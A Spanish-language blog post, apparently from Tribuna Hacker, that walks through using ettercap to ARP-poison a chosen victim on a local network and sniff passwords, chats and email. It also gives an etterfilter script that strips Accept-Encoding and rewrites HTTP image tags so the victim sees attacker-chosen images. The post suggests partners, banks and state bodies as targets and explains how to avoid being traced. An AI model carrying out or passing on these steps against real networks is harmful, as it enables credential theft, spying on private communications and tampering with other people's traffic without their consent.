ettercap

Cómo captar todo el tráfico de una red (incluyendo contraseñas)

La transformación de la mosca en araña. Generalmente nosotras somos moscas en la red. Somos alimento de las arañas que han tejido esta red y ellas se alimentan de nuestros datos, nuestras identidades y cuando ya no tenemos más sustancia simplemente somos descartadas. Nuestras estrategias para no alimentarlas es ocultarnos y herramientas como las incluidas en Parrot o Kali Linux, nos servirán para ello; la otra estrategia es alimentarnos de ellas y para eso nos sirven herramientas como ettercap.

Ettercap es un sniffeador y nos permite alimentarnos de contraseñas y datos de otras usuarias de la red, también nos permitirá alimentarnos de los datos de la proveedora. Como veremos esta herramienta fue creada por las italianas que dieron origen a la odiada Hacking Team y fue con ella que iniciaron su negocio. Un negocio basado en espiarnos a todas y vender esa información a los Estados, un negocio basado en vender estas herramientas a los estados para espiarnos.

Mares de bits se han volcado en la red, rasgándose las vestiduras por lo que hace Hacking Team, no será este el caso. No considero que el problema sea un grupo de mercenarias informáticas, creo sí que son gente repudiable; pero sólo como cualquier otra mercenaria sea que venda sus conocimientos armamentísticos, informáticos, económicos o políticos.

2

¿Por qué es tan importante Ettercap para la seguridad nacional? Pues porque te da acceso a las contraseñas escritas por otras usuarias de nuestra red, leer las conversaciones de chat de todas las aplicaciones privativas y varias libres y el correo en transito o descargado en la terminal accedida.

Por eso; es importante que nosotras sepamos de qué se trata y cómo utilizarlo.

Primero lo descargamos para lo que usamos nuestro ripeador web favorito

# wget http://ettercap.sourceforge.net/download.php

Después accedemos a la carpeta

# cd ettercap
# ./configure
# make
# make install

O depende qué distribución usemos:

(Debian y derivados) apt-get install ettercap-gtk

Una vez instalados entramos nos rooteamos

# su
# SUPASS
# ./ettercap

Se nos abrirá una ventana con varias pestañas vacías, hacemos click en la pestaña Sniff>Unified Sniffing. Va a buscar algunas interfaces que estén conectadas a nuestra red y podemos utilizar para hacer nuestro trabajo.

Nosotras seleccionamos una y hacemos click en aceptar.

Ahora entramos en la pestaña Host>Scan y veremos que tenemos en la parte inferior de la pantalla un aviso “X host added to the hosts list….” (x será el número de máquinas conectadas a su red).

Notamos que nos empiezan a transpirar las manos, una gota de sudor frío cae por nuestra frente, sentimos las garras de la NSA y el Buró rodeándonos y tocamos la pestaña Host>Host list.

Empezarán a aparecer las IP de las máquinas de otras usuarias conectadas a nuestra red y el router al que se comunican, no así la PC de la que estamos trabajando.

Revisamos la lista y seleccionamos nuestra víctima, la marcamos y pulsamos “Add to target 1”, después seleccionamos el IP del router y seleccionamos “Add to target2”. Ahora ya estamos listas para iniciar el ataque, nuestros nervios se profundizan, sentimos el rumor de las sirenas, la matrix acaba de ser accedida. Toco el botón “next” o Aceptar y seré Neo corriendo por el Bulevar perseguida por las de negro.
Main the middle attackLa técnica que vamos a usar se llama Man in the Middle (Hombre en el medio, término machista si los hay) o sea haremos que todos los paquetes que van dirigidos a la PC víctima pasen por nosotras. Esto significa que si nosotras por alguna razón nos desconectamos sin detener el ataque MITM habremos cortado la conexión a internet por un tiempo de nuestro objetivo y dejado nuestras huellas. Lo primero se solucionará al reiniciarse las tablas arp.

Lo segundo es más complicado y depende de nuestro objetivo, si es una amante o novia puede que pase sin darse cuenta; pero si es un banco o un organismo del estado intentarán encontrar la IP y asociarla con los datos de georeferencia. Por eso es importante que mantengamos el control y no nos pongamos histéricas.

Ahora clickeamos sobre la pestaña MITM>ARP POISONING y marcamos “Sniff remote connections” y damos Aceptar
Para terminar vamos a la pestaña Start>Start sniffing y nos veremos husmeando el tráfico de la red, ya estamos dentro.
Ahora clikeamos View>Connections y podremos ver todas las conexiones que vamos conectando, si hacemos doble click sobre alguna nos mostrará los datos que esa usuaria depositó, sus conversaciones, usuarias de redes y por supuesto sus claves.
Ahora es solo cuestión de práctica y mucha elegancia al usar la misma araña de los Estados y Organismos de Seguridad.

YAPA HACK

Les comparto este filtro que me compartieron en la red y que sirve para cambiar las imágenes de la máquina que estemos atacando con MITM (Man in the middle).

Primero lo descargamos con nuestro wget
# wget http://www.irongeek.com/i.php?page=security/ettercapfilter

vamos a la descarga lo abrimos con nuestro editor favorito
# nano ettercapfilter
y veremos algo como lo siguiente:

############################################################################
#                                                                          #
#  Jolly Pwned — ig.filter — filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Rubbish!”);
# note: replacement string is same length as original string
msg(“zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(“img src=”, “img src=\”http://www.irongeek.com/images/jollypwn.png\” “);
replace(“IMG SRC=”, “img src=\”http://www.irongeek.com/images/jollypwn.png\” “);
msg(“Filter Ran.\n”);
}

}

Bueno; ahora vamos a personalizarlo cambiando la dirección de las imagenes por ejemplo las de Tribuna Hacker con lo que tendríamos algo así:

if (ip.proto == TCP && tcp.src == 80) {
replace(“img src=”, “img src=\”https://www.tribunahacker.com.ar/\” “);
replace(“IMG SRC=”, “img src=\”https://www.tribunahacker.com.ar/\” “);
msg(“Filter Ran.\n”);
}

guardamos crtl+o agregando la extensión filter (ej: imagen.filter)y salimos ctrl+x.

Ahora compilamos
# etterfilter imagen.filter -o imagen.ef

Con esto se generará la imagen.ef que copiaremos al directorio ettercap
# cp -a imagen.ef /usr/share/ettercap

Ya terminado arrancamos ettercap y repetimos los pasos del tutorial, cuando hacemos el MITM vamos a la pestaña filters>load a filter, seleccionamos el archivo imagen.ef y pulsamos aceptar. Con esto y aunque muchas no lo crean la víctima verá las imágenes que nosotras le digitamos remotamente.

Como siempre digo: nosotras te damos el conocimiento vos decidís si tomás la pastilla azul y sos una esclava o una mercenaria o la roja y sos una rebelde.

Fuente del filtro

image/svg+xmlTribuna Hacker existe gracias a

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *